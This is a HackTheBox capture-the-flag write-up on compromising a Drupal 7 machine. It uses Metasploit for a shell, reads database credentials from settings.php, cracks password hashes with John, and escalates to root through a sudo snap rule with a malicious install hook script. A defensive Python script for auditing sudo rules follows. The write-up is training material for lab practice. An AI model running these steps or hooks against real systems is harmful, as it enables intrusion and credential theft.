![7d7d53d0b5f332b4cbafe6bdcd30c2ee.png](b81d625b23ad4bdda6d49bae5229a860.png)

### Port Scanning and General Enumeration (Nmap)

My all-ports (`-p-`) scan showed only 22 and 80 open. Not much.

![b500616c4207aa9cc48e4190ddce65a9.png](c8b2e7e4adac4cf4a51efbe7b9e38c1e.png)

Tons of disallows in **robots.txt**, but nothing super interesting. It does give away the **Drupal** version number, though. Is 7 vulnerable to anything?

---

### Access (searchsploit, metasploit, drupal)

Let's check **searchsploit** for **Drupal 7**.

![32204402cf361d87f0db376a0e51aeb7.png](64fe0432ded3489c8e55265dd8bc5c77.png)

Looks like there's a Ruby module for Metasploit.

1. `msfconsole`
2. `search drupal 7`

![a8c54725cf4f15cece3bc602969231b8.png](a28cc04e16084275a82ce29b3f116cdb.png)

3. `use 4`
4. `set lhost tun0`
5. `set rhosts MACHINEIP`

Using search result 4 we get a shell as `apache`, but it's really bad.

After some googling for locations, I found the **Drupal config file** at `/var/www/html/sites/default/settings.php`. Database creds in that file!

![7d5d856adb4768adaee4eb2d25085625.png](10024dc310054ba6bef123649755e18b.png)

`mysql -u drupaluser -p`

Can't get output from mysql, but it's working.

1. `use drupal;`
2. `select name, pass from users;`

![a276807aedcd4404caaeabc316688f4d.png](0aebfe31d5134aa286c178d245e300bb.png)

Saved the hash and ran it through John.

![975a6d61d816535119c9a3689af43b0c.png](1f431373095e4e5698cfb1d51fd351a5.png)

The cracked hash gave us the password for the **brucetherealadmin** account. SSH in and capture the user flag!

![8820ff079e8aac0f31a68576d74c2b64.png](511c5569be534af5ada9ae4055b575eb.png)

---

### Privesc (sudo, snap, fpm, gtfobins)

`sudo -l`

![4a316a471c7ac89a3ac67b6b6e65e36b.png](82b556430aa54bea8f3559024507f763.png)

GTFOBins entry for snap: https://gtfobins.github.io/gtfobins/snap/

Follow the directions and use **fpm** to generate the snap we need; before you upload it, though, edit the `/meta/hooks/install` file. Mine just cats the flag, but you can use whatever command you want.
```
#!/bin/sh
# the hook runs as root during `snap install`; `false` makes the install fail
# so the package is not left installed afterwards
cat /root/root.txt; false
```

![a5561409fd52d4bb237fbd8c7a5f4a26.png](5828895e7795493ea86ab12096caa8c5.png)

Root flag!

---

Back to [[HackTheBox Index]]

Tags: #htb #metasploit #johntheripper #hashcracking #snap

Related:
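As an added, defender-side example that is not part of this write-up: a small Python audit that parses `sudo -l` output like the one in the privesc section and flags rules handing root to a package manager, which is exactly what makes the snap install hook trick work. The sample output, the hostname `webhost` and the second rule are constructed; only the account name comes from the write-up.

```python
"""Audit `sudo -l` output for rules that give root to caller-controlled code.

Added example, not from the write-up. SAMPLE_SUDO_L is constructed.
"""
import re
from pathlib import PurePosixPath

# Binaries whose intended behaviour runs code supplied by the caller as the
# run-as user. snap is the write-up's case: a local .snap's meta/hooks/install
# script runs as root during `snap install`.
PACKAGE_MANAGERS = {
    "snap": "a local .snap file's install hook runs as root during installation",
    "dpkg": "a local .deb file's maintainer scripts run as root during installation",
}

# One "(runas) TAG: TAG: command, command" line from the "may run" block.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

# Constructed sample in the shape sudo prints; hostname and second rule invented.
SAMPLE_SUDO_L = """\
Matching Defaults entries for brucetherealadmin on webhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User brucetherealadmin may run the following commands on webhost:
    (root) NOPASSWD: /usr/bin/snap install *
    (root) /usr/bin/systemctl restart apache2
"""


def parse_sudo_l(output: str) -> list[dict]:
    """Return one dict per command listed under 'may run the following commands'."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(", "):  # sudo separates commands with ", "
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m["runas"].strip(), "tags": tags, "command": cmd})
    return rules


def audit_rules(rules: list[dict]) -> list[dict]:
    """Flag rules where the run-as user's privileges reach caller-chosen code."""
    findings = []
    for rule in rules:
        cmd = rule["command"]
        binary = "ALL" if cmd == "ALL" else PurePosixPath(cmd.split()[0]).name
        reasons = []
        if cmd == "ALL":
            reasons.append("ALL grants every command")
        elif binary in PACKAGE_MANAGERS:
            reasons.append(PACKAGE_MANAGERS[binary])
        if not reasons:
            continue  # a narrowly scoped command like a service restart is fine
        if "*" in cmd:
            reasons.append("wildcard argument lets the caller pick the file to install")
        nopasswd = "NOPASSWD" in rule["tags"]
        if nopasswd:
            reasons.append("NOPASSWD: a hijacked session needs no password to use it")
        findings.append({
            "runas": rule["runas"],
            "binary": binary,
            "command": cmd,
            "nopasswd": nopasswd,
            "reasons": reasons,
            "fix": "drop the rule, or pin the argument to a fixed, non-local package name",
        })
    return findings


def audit_sudo_l(output: str) -> list[dict]:
    """Convenience wrapper: raw `sudo -l` text in, findings out."""
    return audit_rules(parse_sudo_l(output))


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{f['runas']}] {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
        print(f"    fix: {f['fix']}")
```

On a real host feed it `sudo -l -U <user>` output (or each entry from `sudo -l -l`); the wildcard and NOPASSWD checks are the two aggravating factors worth reporting alongside the binary itself, since removing either one already shrinks the exposure.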